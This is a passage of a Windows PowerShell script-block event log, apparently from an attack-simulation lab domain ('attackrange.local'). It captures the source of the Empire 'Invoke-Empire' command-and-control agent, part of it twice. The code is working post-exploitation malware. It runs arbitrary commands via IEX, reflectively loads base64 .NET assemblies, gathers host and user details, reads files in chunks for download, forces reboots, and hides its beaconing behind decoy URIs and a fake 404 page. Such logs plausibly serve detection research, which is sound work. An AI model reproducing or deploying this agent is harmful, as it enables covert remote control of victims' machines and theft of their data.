        $DefaultResponse = "PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgU3RyaWN0Ly9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXN0cmljdC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIi8+DQo8dGl0bGU+NDA0IC0gRmlsZSBvciBkaXJlY3Rvcnkgbm90IGZvdW5kLjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keXttYXJnaW46MDtmb250LXNpemU6LjdlbTtmb250LWZhbWlseTpWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmO2JhY2tncm91bmQ6I0VFRUVFRTt9DQpmaWVsZHNldHtwYWRkaW5nOjAgMTVweCAxMHB4IDE1cHg7fSANCmgxe2ZvbnQtc2l6ZToyLjRlbTttYXJnaW46MDtjb2xvcjojRkZGO30NCmgye2ZvbnQtc2l6ZToxLjdlbTttYXJnaW46MDtjb2xvcjojQ0MwMDAwO30gDQpoM3tmb250LXNpemU6MS4yZW07bWFyZ2luOjEwcHggMCAwIDA7Y29sb3I6IzAwMDAwMDt9IA0KI2hlYWRlcnt3aWR0aDo5NiU7bWFyZ2luOjAgMCAwIDA7cGFkZGluZzo2cHggMiUgNnB4IDIlO2ZvbnQtZmFtaWx5OiJ0cmVidWNoZXQgTVMiLCBWZXJkYW5hLCBzYW5zLXNlcmlmO2NvbG9yOiNGRkY7DQpiYWNrZ3JvdW5kLWNvbG9yOiM1NTU1NTU7fQ0KI2NvbnRlbnR7bWFyZ2luOjAgMCAwIDIlO3Bvc2l0aW9uOnJlbGF0aXZlO30NCi5jb250ZW50LWNvbnRhaW5lcntiYWNrZ3JvdW5kOiNGRkY7d2lkdGg6OTYlO21hcmdpbi10b3A6OHB4O3BhZGRpbmc6MTBweDtwb3NpdGlvbjpyZWxhdGl2ZTt9DQotLT4NCjwvc3R5bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxkaXYgaWQ9ImhlYWRlciI+PGgxPlNlcnZlciBFcnJvcjwvaDE+PC9kaXY+DQo8ZGl2IGlkPSJjb250ZW50Ij4NCiA8ZGl2IGNsYXNzPSJjb250ZW50LWNvbnRhaW5lciI+PGZpZWxkc2V0Pg0KICA8aDI+NDA0IC0gRmlsZSBvciBkaXJlY3Rvcnkgbm90IGZvdW5kLjwvaDI+DQogIDxoMz5UaGUgcmVzb3VyY2UgeW91IGFyZSBsb29raW5nIGZvciBtaWdodCBoYXZlIGJlZW4gcmVtb3ZlZCwgaGFkIGl0cyBuYW1lIGNoYW5nZWQsIG9yIGlzIHRlbXBvcmFyaWx5IHVuYXZhaWxhYmxlLjwvaDM+DQogPC9maWVsZHNldD48L2Rpdj4NCjwvZGl2Pg0KPC9ib2R5Pg0KPC9odG1sPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA="
    )
    $Encoding = [System.Text.Encoding]::ASCII
    $HMAC = New-Object System.Security.Cryptography.HMACSHA256
    $script:AgentDelay = $AgentDelay
    $script:AgentJitter = $AgentJitter
    $script:LostLimit = $LostLimit
    $script:MissedCheckins = 0
    $script:ResultIDs = @{}
    $script:WorkingHours = $WorkingHours
    $script:DefaultResponse = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DefaultResponse))
    $script:Proxy = $ProxySettings
    $script:CurrentListenerName = ""
    $Script:ServerIndex = 0
    $Script:ControlServers = $Servers
    $Retries = 1
    if($KillDays) {
        $script:KillDate = (Get-Date).AddDays($KillDays).ToString('MM/dd/yyyy')
    }
    if($KillDate -ne "REPLACE_KILLDATE" -and $KillDate -ne $null) {
        $script:KillDate = $KillDate
    }
    $ProfileParts = $Profile.split('|')
    $script:TaskURIs = $ProfileParts[0].split(',')
    $script:UserAgent = $ProfileParts[1]
    $script:SessionID = $SessionID
    $script:Headers = @{}
    if($ProfileParts[2]) {
        $ProfileParts[2..$ProfileParts.length] | ForEach-Object {
            $Parts = $_.Split(':')
            $script:Headers.Add($Parts[0],$Parts[1])
        }
    }
    $Script:Jobs = @{}
    $Script:Downloads = @{}
    $script:ImportedScript = ''
    function ConvertTo-Rc4ByteStream {
        Param ($In, $RCK)
        begin {
            [Byte[]] $S = 0..255;
            $J = 0;
            0..255 | ForEach-Object {
                $J = ($J + $S[$_] + $RCK[$_ % $RCK.Length]) % 256;
                $S[$_], $S[$J] = $S[$J], $S[$_];
            };
            $I = $J = 0;
        }
        process {
            ForEach($Byte in $In) {
                $I = ($I + 1) % 256;
                $J = ($J + $S[$I]) % 256;
                $S[$I], $S[$J] = $S[$J], $S[$I];
                $Byte -bxor $S[($S[$I] + $S[$J]) % 256];
            }
        }
    }
    function Get-HexString {
        param([byte]$Data)
        ($Data | ForEach-Object { "{0:X2}" -f $_ }) -join ' '
    }
    function Set-Delay {
        param([int]$d, [double]$j=0.0)
        $script:AgentDelay = $d
        $script:AgentJitter = $j
        "agent interval set to $script:AgentDelay seconds with a jitter of $script:AgentJitter"
    }
    function Get-Delay {
        "agent interval delay interval: $script:AgentDelay seconds with a jitter of $script:AgentJitter"
    }
    function Set-LostLimit {
        param([int]$l)
        $script:LostLimit = $l
        if($l -eq 0)
        {
            "agent set to never die based on checkin Limit"
        }
        else
        {
            "agent LostLimit set to $script:LostLimit"
        }
    }
    function Get-LostLimit {
        "agent LostLimit: $script:LostLimit"
    }
    function Set-Killdate {
        param([string]$date)
        $script:KillDate = $date
        "agent killdate set to $script:KillDate"
    }
    function Get-Killdate {
        "agent killdate: $script:KillDate"
    }
    function Set-WorkingHours {
        param([string]$hours)
        $script:WorkingHours = $hours
        "agent working hours set to $($script:WorkingHours)"
    }
    function Get-WorkingHours {
        "agent working hours: $($script:WorkingHours)"
    }
    function Get-Sysinfo {
        $str = '0|' # no nonce for normal execution
        $str += $Script:ControlServers[$Script:ServerIndex]
        $str += '|' + [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
        $p = (Get-WmiObject Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress);
        $ip = @{$true=$p[0];$false=$p}[$p.Length -lt 6];
        $str+="|$ip"
        $str += '|' +(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq 'system') {
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
        }
        $n = [System.Diagnostics.Process]::GetCurrentProcess();
        $str += '|'+$n.ProcessName+'|'+$n.Id;
        $str += "|powershell|" + $PSVersionTable.PSVersion.Major;
        $str
    }
    function Invoke-ShellCommand {
        param($cmd, $cmdargs="")
        if ($cmdargs -like "*`"\\*") {
            $cmdargs = $cmdargs -replace "`"\\","FileSystem::`"\"
        }
        elseif ($cmdargs -like "*\\*") {
            $cmdargs = $cmdargs -replace "\\\\","FileSystem::\\"
        }
        $output = ''
        if ($cmd.ToLower() -eq 'shell') {
            if ($cmdargs.length -eq '') { $output = 'no shell command supplied' }
            else {
                $OldConsoleOut = [Console]::Out
                $StringWriter = New-Object IO.StringWriter
                [Console]::SetOut($StringWriter)
                $output = iex "$cmdargs" | out-string
                [Console]::SetOut($OldConsoleOut)
                if ($output.length -eq 0){
                    $output = $StringWriter.ToString()
                    }
            }
            $output += "`n`r..Command execution completed."
        }
        elseif ($cmd.ToLower() -eq 'reflectiveload'){
            if ($cmdargs.length -eq '') { $output = 'no binary supplied' }
            else{
                $assembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($cmdargs))
                $output = "`n`r Reflective Load Complete"
            }
        }
        else {
            switch -regex ($cmd) {
                '(ls|^dir)' {
                    if ($cmdargs.length -eq "") {
                        $output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner }},lastwritetime,length,name
                    }
                    else {
                        try{
                            $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop" | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
                        }
                        catch [System.Management.Automation.ActionPreferenceStopException] {
                            $output = "[!] Error: $_ (or cannot be accessed)."
                        }
                    }
                }
                '(mv|move|copy|cp|rm|del|rmdir|mkdir)' {
                    if ($cmdargs.length -ne "") {
                        try {
                            IEX "$cmd $cmdargs -Force -ErrorAction Stop"
                            $output = "executed $cmd $cmdargs"
                        }
                        catch {
                            $output=$_.Exception;
                        }
                    }
                }
                cd {
                    if ($cmdargs.length -ne '')
                    {
                        $cmdargs = $cmdargs.trim("`"").trim("'")
                        cd "$cmdargs"
                        $output = pwd
                    }
                }
                '(ipconfig|ifconfig)' {
                    $output = Get-WmiObject -class 'Win32_NetworkAdapterConfiguration' | ? {$_.IPEnabled -Match 'True'} | ForEach-Object {
                        $out = New-Object psobject
                        $out | Add-Member Noteproperty 'Description' $_.Description
                        $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress
                        $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled
                        $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",")
                        $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",")
                        $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",")
                        $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",")
                        $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName
                        $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",")
                        $out
                    } | fl | Out-String | ForEach-Object {$_ + "`n"}
                }
                '(ps|tasklist)' {
                    $owners = @{}
                    Get-WmiObject win32_process | ForEach-Object {$o = $_.getowner(); if(-not $($o.User)) {$o='N/A'} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o}
                    if($cmdargs -ne '') { $p = $cmdargs }
                    else{ $p = "*" }
                    $output = Get-Process $p | ForEach-Object {
                        $arch = 'x64'
                        if ([System.IntPtr]::Size -eq 4) {
                            $arch = 'x86'
                        }
                        else{
                            foreach($module in $_.modules) {
                                if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") {
                                    $arch = 'x86'
                                    break
                                }
                            }
                        }
                        $out = New-Object psobject
                        $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName
                        $out | Add-Member Noteproperty 'PID' $_.ID
                        $out | Add-Member Noteproperty 'Arch' $arch
                        $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()]
                        $mem = "{0:N2} MB" -f $($_.WS/1MB)
                        $out | Add-Member Noteproperty 'MemUsage' $mem
                        $out
                    } | Sort-Object -Property PID
                }
                getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() }
                route {
                    if (($cmdargs.length -eq '') -or ($cmdargs.lower() -eq 'print')) {
                        $adapters = @{}
                        Get-WmiObject Win32_NetworkAdapterConfiguration | ForEach-Object { $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress }
                        $output = Get-WmiObject win32_IP4RouteTable | ForEach-Object {
                            $out = New-Object psobject
                            $out | Add-Member Noteproperty 'Destination' $_.Destination
                            $out | Add-Member Noteproperty 'Netmask' $_.Mask
                            if ($_.NextHop -eq "0.0.0.0") {
                                $out | Add-Member Noteproperty 'NextHop' 'On-link'
                            }
                            else{
                                $out | Add-Member Noteproperty 'NextHop' $_.NextHop
                            }
                            if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")) {
                                $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",")
                            }
                            else {
                                $out | Add-Member Noteproperty 'Interface' '127.0.0.1'
                            }
                            $out | Add-Member Noteproperty 'Metric' $_.Metric1
                            $out
                        } | ft -autosize | Out-String
                    }
                    else { $output = route $cmdargs }
                }
                '(whoami|getuid)' { $output = [Security.Principal.WindowsIdentity]::GetCurrent().Name }
                hostname {
                    $output = [System.Net.Dns]::GetHostByName(($env:computerName))
                }
                '(reboot|restart)' { Restart-Computer -force }
                shutdown { Stop-Computer -force }
                default {
                    if ($cmdargs.length -eq '') { $output = IEX $cmd }
                    else { $output = IEX "$cmd $cmdargs" }
                }
            }
        }
        "`n"+($output | Format-Table -w

ScriptBlock ID: 14268e97-4d5a-4644-b27d-800b043b67bf
Path:
06/09/2021 07:18:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=114992
Keywords=None
Message=Creating Scriptblock text (1 of 3):
function Invoke-Empire {
    param(
        [Parameter(Mandatory=$true)]
        [String]
        $StagingKey,
        [Parameter(Mandatory=$true)]
        [String]
        $SessionKey,
        [Parameter(Mandatory=$true)]
        [String]
        $SessionID,
        [Int32]
        $AgentDelay = 5,
        [Double]
        $AgentJitter = 0.0,
        [String[]]
        $Servers,
        [String]
        $KillDate,
        [Int32]
        $KillDays,
        [String]
        $WorkingHours,
        [object]
        $ProxySettings,
        [String]
        $Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
        [Int32]
        $LostLimit = 60,
        [String]
        $DefaultResponse = "PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgU3RyaWN0Ly9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXN0cmljdC5kdGQiPg0KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPg0KPGhlYWQ+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIi8+DQo8dGl0bGU+NDA0IC0gRmlsZSBvciBkaXJlY3Rvcnkgbm90IGZvdW5kLjwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keXttYXJnaW46MDtmb250LXNpemU6LjdlbTtmb250LWZhbWlseTpWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmO2JhY2tncm91bmQ6I0VFRUVFRTt9DQpmaWVsZHNldHtwYWRkaW5nOjAgMTVweCAxMHB4IDE1cHg7fSANCmgxe2ZvbnQtc2l6ZToyLjRlbTttYXJnaW46MDtjb2xvcjojRkZGO30NCmgye2ZvbnQtc2l6ZToxLjdlbTttYXJnaW46MDtjb2xvcjojQ0MwMDAwO30gDQpoM3tmb250LXNpemU6MS4yZW07bWFyZ2luOjEwcHggMCAwIDA7Y29sb3I6IzAwMDAwMDt9IA0KI2hlYWRlcnt3aWR0aDo5NiU7bWFyZ2luOjAgMCAwIDA7cGFkZGluZzo2cHggMiUgNnB4IDIlO2ZvbnQtZmFtaWx5OiJ0cmVidWNoZXQgTVMiLCBWZXJkYW5hLCBzYW5zLXNlcmlmO2NvbG9yOiNGRkY7DQpiYWNrZ3JvdW5kLWNvbG9yOiM1NTU1NTU7fQ0KI2NvbnRlbnR7bWFyZ2luOjAgMCAwIDIlO3Bvc2l0aW9uOnJlbGF0aXZlO30NCi5jb250ZW50LWNvbnRhaW5lcntiYWNrZ3JvdW5kOiNGRkY7d2lkdGg6OTYlO21hcmdpbi10b3A6OHB4O3BhZGRpbmc6MTBweDtwb3NpdGlvbjpyZWxhdGl2ZTt9DQotLT4NCjwvc3R5bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxkaXYgaWQ9ImhlYWRlciI+PGgxPlNlcnZlciBFcnJvcjwvaDE+PC9kaXY+DQo8ZGl2IGlkPSJjb250ZW50Ij4NCiA8ZGl2IGNsYXNzPSJjb250ZW50LWNvbnRhaW5lciI+PGZpZWxkc2V0Pg0KICA8aDI+NDA0IC0gRmlsZSBvciBkaXJlY3Rvcnkgbm90IGZvdW5kLjwvaDI+DQogIDxoMz5UaGUgcmVzb3VyY2UgeW91IGFyZSBsb29raW5nIGZvciBtaWdodCBoYXZlIGJlZW4gcmVtb3ZlZCwgaGFkIGl0cyBuYW1lIGNoYW5nZWQsIG9yIGlzIHRlbXBvcmFyaWx5IHVuYXZhaWxhYmxlLjwvaDM+DQogPC9maWVsZHNldD48L2Rpdj4NCjwvZGl2Pg0KPC9ib2R5Pg0KPC9odG1sPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA="
    )
    $Encoding = [System.Text.Encoding]::ASCII
    $HMAC = New-Object System.Security.Cryptography.HMACSHA256
    $script:AgentDelay = $AgentDelay
    $script:AgentJitter = $AgentJitter
    $script:LostLimit = $LostLimit
    $script:MissedCheckins = 0
    $script:ResultIDs = @{}
    $script:WorkingHours = $WorkingHours
    $script:DefaultResponse = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DefaultResponse))
    $script:Proxy = $ProxySettings
    $script:CurrentListenerName = ""
    $Script:ServerIndex = 0
    $Script:ControlServers = $Servers
    $Retries = 1
    if($KillDays) {
        $script:KillDate = (Get-Date).AddDays($KillDays).ToString('MM/dd/yyyy')
    }
    if($KillDate -ne "REPLACE_KILLDATE" -and $KillDate -ne $null) {
        $script:KillDate = $KillDate
    }
    $ProfileParts = $Profile.split('|')
    $script:TaskURIs = $ProfileParts[0].split(',')
    $script:UserAgent = $ProfileParts[1]
    $script:SessionID = $SessionID
    $script:Headers = @{}
    if($ProfileParts[2]) {
        $ProfileParts[2..$ProfileParts.length] | ForEach-Object {
            $Parts = $_.Split(':')
            $script:Headers.Add($Parts[0],$Parts[1])
        }
    }
    $Script:Jobs = @{}
    $Script:Downloads = @{}
    $script:ImportedScript = ''
    function ConvertTo-Rc4ByteStream {
        Param ($In, $RCK)
        begin {
            [Byte[]] $S = 0..255;
            $J = 0;
            0..255 | ForEach-Object {
                $J = ($J + $S[$_] + $RCK[$_ % $RCK.Length]) % 256;
                $S[$_], $S[$J] = $S[$J], $S[$_];
            };
            $I = $J = 0;
        }
        process {
            ForEach($Byte in $In) {
                $I = ($I + 1) % 256;
                $J = ($J + $S[$I]) % 256;
                $S[$I], $S[$J] = $S[$J], $S[$I];
                $Byte -bxor $S[($S[$I] + $S[$J]) % 256];
            }
        }
    }
    function Get-HexString {
        param([byte]$Data)
        ($Data | ForEach-Object { "{0:X2}" -f $_ }) -join ' '
    }
    function Set-Delay {
        param([int]$d, [double]$j=0.0)
        $script:AgentDelay = $d
        $script:AgentJitter = $j
        "agent interval set to $script:AgentDelay seconds with a jitter of $script:AgentJitter"
    }
    function Get-Delay {
        "agent interval delay interval: $script:AgentDelay seconds with a jitter of $script:AgentJitter"
    }
    function Set-LostLimit {
        param([int]$l)
        $script:LostLimit = $l
        if($l -eq 0)
        {
            "agent set to never die based on checkin Limit"
        }
        else
        {
            "agent LostLimit set to $script:LostLimit"
        }
    }
    function Get-LostLimit {
        "agent LostLimit: $script:LostLimit"
    }
    function Set-Killdate {
        param([string]$date)
        $script:KillDate = $date
        "agent killdate set to $script:KillDate"
    }
    function Get-Killdate {
        "agent killdate: $script:KillDate"
    }
    function Set-WorkingHours {
        param([string]$hours)
        $script:WorkingHours = $hours
        "agent working hours set to $($script:WorkingHours)"
    }
    function Get-WorkingHours {
        "agent working hours: $($script:WorkingHours)"
    }
    function Get-Sysinfo {
        $str = '0|' # no nonce for normal execution
        $str += $Script:ControlServers[$Script:ServerIndex]
        $str += '|' + [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName;
        $p = (Get-WmiObject Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress);
        $ip = @{$true=$p[0];$false=$p}[$p.Length -lt 6];
        $str+="|$ip"
        $str += '|' +(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq 'system') {
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
        }
        $n = [System.Diagnostics.Process]::GetCurrentProcess();
        $str += '|'+$n.ProcessName+'|'+$n.Id;
        $str += "|powershell|" + $PSVersionTable.PSVersion.Major;
        $str
    }
    function Invoke-ShellCommand {
        param($cmd, $cmdargs="")
        if ($cmdargs -like "*`"\\*") {
            $cmdargs = $cmdargs -replace "`"\\","FileSystem::`"\"
        }
        elseif ($cmdargs -like "*\\*") {
            $cmdargs = $cmdargs -replace "\\\\","FileSystem::\\"
        }
        $output = ''
        if ($cmd.ToLower() -eq 'shell') {
            if ($cmdargs.length -eq '') { $output = 'no shell command supplied' }
            else {
                $OldConsoleOut = [Console]::Out
                $StringWriter = New-Object IO.StringWriter
                [Console]::SetOut($StringWriter)
                $output = iex "$cmdargs" | out-string
                [Console]::SetOut($OldConsoleOut)
                if ($output.length -eq 0){
                    $output = $StringWriter.ToString()
                    }
            }
            $output += "`n`r..Command execution completed."
        }
        elseif ($cmd.ToLower() -eq 'reflectiveload'){
            if ($cmdargs.length -eq '') { $output = 'no binary supplied' }
            else{
                $assembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($cmdargs))
                $output = "`n`r Reflective Load Complete"
            }
        }
        else {
            switch -regex ($cmd) {
                '(ls|^dir)' {
                    if ($cmdargs.length -eq "") {
                        $output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner }},lastwritetime,length,name
                    }
                    else {
                        try{
                            $output = IEX "$cmd $cmdargs -Force -ErrorAction Stop" | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
                        }
                        catch [System.Management.Automation.ActionPreferenceStopException] {
                            $output = "[!] Error: $_ (or cannot be accessed)."
                        }
                    }
                }
                '(mv|move|copy|cp|rm|del|rmdir|mkdir)' {
                    if ($cmdargs.length -ne "") {
                        try {
                            IEX "$cmd $cmdargs -Force -ErrorAction Stop"
                            $output = "executed $cmd $cmdargs"
                        }
                        catch {
                            $output=$_.Exception;
                        }
                    }
                }
                cd {
                    if ($cmdargs.length -ne '')
                    {
                        $cmdargs = $cmdargs.trim("`"").trim("'")
                        cd "$cmdargs"
                        $output = pwd
                    }
                }
                '(ipconfig|ifconfig)' {
                    $output = Get-WmiObject -class 'Win32_NetworkAdapterConfiguration' | ? {$_.IPEnabled -Match 'True'} | ForEach-Object {
                        $out = New-Object psobject
                        $out | Add-Member Noteproperty 'Description' $_.Description
                        $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress
                        $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled
                        $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",")
                        $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",")
                        $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",")
                        $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",")
                        $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName
                        $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",")
                        $out
                    } | fl | Out-String | ForEach-Object {$_ + "`n"}
                }
                '(ps|tasklist)' {
                    $owners = @{}
                    Get-WmiObject win32_process | ForEach-Object {$o = $_.getowner(); if(-not $($o.User)) {$o='N/A'} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o}
                    if($cmdargs -ne '') { $p = $cmdargs }
                    else{ $p = "*" }
                    $output = Get-Process $p | ForEach-Object {
                        $arch = 'x64'
                        if ([System.IntPtr]::Size -eq 4) {
                            $arch = 'x86'
                        }
                        else{
                            foreach($module in $_.modules) {
                                if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") {
                                    $arch = 'x86'
                                    break
                                }
                            }
                        }
                        $out = New-Object psobject
                        $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName
                        $out | Add-Member Noteproperty 'PID' $_.ID
                        $out | Add-Member Noteproperty 'Arch' $arch
                        $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()]
                        $mem = "{0:N2} MB" -f $($_.WS/1MB)
                        $out | Add-Member Noteproperty 'MemUsage' $mem
                        $out
                    } | Sort-Object -Property PID
                }
                getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() }
                route {
                    if (($cmdargs.length -eq '') -or ($cmdargs.lower() -eq 'print')) {
                        $adapters = @{}
                        Get-WmiObject Win32_NetworkAdapterConfiguration | ForEach-Object { $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress }
                        $output = Get-WmiObject win32_IP4RouteTable | ForEach-Object {
                            $out = New-Object psobject
                            $out | Add-Member Noteproperty 'Destination' $_.Destination
                            $out | Add-Member Noteproperty 'Netmask' $_.Mask
                            if ($_.NextHop -eq "0.0.0.0") {
                                $out | Add-Member Noteproperty 'NextHop' 'On-link'
                            }
                            else{
                                $out | Add-Member Noteproperty 'NextHop' $_.NextHop
                            }
                            if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")) {
                                $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",")
                            }
                            else {
                                $out | Add-Member Noteproperty 'Interface' '127.0.0.1'
                            }
                            $out | Add-Member Noteproperty 'Metric' $_.Metric1
                            $out
                        } | ft -autosize | Out-String
                    }
                    else { $output = route $cmdargs }
                }
                '(whoami|getuid)' { $output = [Security.Principal.WindowsIdentity]::GetCurrent().Name }
                hostname {
                    $output = [System.Net.Dns]::GetHostByName(($env:computerName))
                }
                '(reboot|restart)' { Restart-Computer -force }
                shutdown { Stop-Computer -force }
                default {
                    if ($cmdargs.length -eq '') { $output = IEX $cmd }
                    else { $output = IEX "$cmd $cmdargs" }
                }
            }
        }
        "`n"+($output | Format-Table -wrap | Out-String)
    }
    function Start-AgentJob {
        param($ScriptString)
        $RandName = -join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 6)
        $AppDomain = [AppDomain]::CreateDomain($RandName)
        $PSHost = $AppDomain.Load([PSObject].Assembly.FullName).GetType('System.Management.Automation.PowerShell')::Create()
        $null = $PSHost.AddScript($ScriptString)
        $Buffer = New-Object 'System.Management.Automation.PSDataCollection[PSObject]'
        $PSobjectCollectionType = [Type]'System.Management.Automation.PSDataCollection[PSObject]'
        $BeginInvoke = ($PSHost.GetType().GetMethods() | ? { $_.Name -eq 'BeginInvoke' -and $_.GetParameters().Count -eq 2 }).MakeGenericMethod(@([PSObject], [PSObject]))
        $Job = $BeginInvoke.Invoke($PSHost, @(($Buffer -as $PSobjectCollectionType), ($Buffer -as $PSobjectCollectionType)))
        $Script:Jobs[$RandName] = @{'Alias'=$RandName; 'AppDomain'=$AppDomain; 'PSHost'=$PSHost; 'Job'=$Job; 'Buffer'=$Buffer}
        $RandName
    }
    function Get-AgentJobCompleted {
        param($JobName)
        if($Script:Jobs.ContainsKey($JobName)) {
            $Script:Jobs[$JobName]['Job'].IsCompleted
        }
    }
    function Receive-AgentJob {
        param($JobName)
        if($Script:Jobs.ContainsKey($JobName)) {
            $Script:Jobs[$JobName]['Buffer'].ReadAll()
        }
    }
    function Stop-AgentJob {
        param($JobName)
        if($Script:Jobs.ContainsKey($JobName)) {
            $Null = $Script:Jobs[$JobName]['PSHost'].Stop()
            $Script:Jobs[$JobName]['Buffer'].ReadAll()
            $Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain'])
            $Script:Jobs.Remove($JobName)
        }
    }
    function Update-Profile {
        param($Profile)
        $ProfileParts = $Profile.split('|')
        $script:TaskURIs = $ProfileParts[0].split(',')
        $script:UserAgent = $ProfileParts[1]
        $script:SessionID = $SessionID
        $script:Headers = @{}
        if($ProfileParts[2]) {
            $ProfileParts[2..$ProfileParts.length] | ForEach-Object {
                $Parts = $_.Split(':')
                $script:Headers.Add($Parts[0],$Parts[1])
            }
        }
        "Agent updated with profile $Profile"
    }
    function Get-FilePart {
        Param(
            [string] $File,
            [int] $Index = 0,
            $ChunkSize = 512KB,
            [switch] $NoBase64
        )
        try {
            $f = Get-Item "$File"
            $FileLength = $f.length
            $FromFile = [io.file]::OpenRead($File)
            if ($FileLength -lt $ChunkSize) {
                if($Index -eq 0) {
                    $buff = new-object byte[] $FileLength
                    $count = $FromFile.Read($buff, 0, $buff.Length)
                    if($NoBase64) {
                        $buff
                    }
                    else{
                        [System.Convert]::ToBase64String($buff)
                    }
                }
                else{
                    $Null
                }
            }
            else{
                $buff = new-object byte[] $ChunkSize
                $Start = $Index * $($ChunkSize)
                $null = $FromFile.Seek($Start,0)
                $count = $FromFile.Read($buff, 0, $buff.Length)
                if ($count -gt 0) {
                    if($count -ne $ChunkSize) {
                        $buff2 = new-object byte[] $count
                        [array]::copy($buff, $buff2, $count)
                        if($NoBase64) {
                            $buff2
                        }
                        else{
                            [System.Convert]::ToBase64String($buff2)
                        }
                    }
                    else{
                        if($NoBase64) {
                            $buff
                        }
                        else{
                            [System.Convert]::ToBase64String($buff)
                        }
                    }
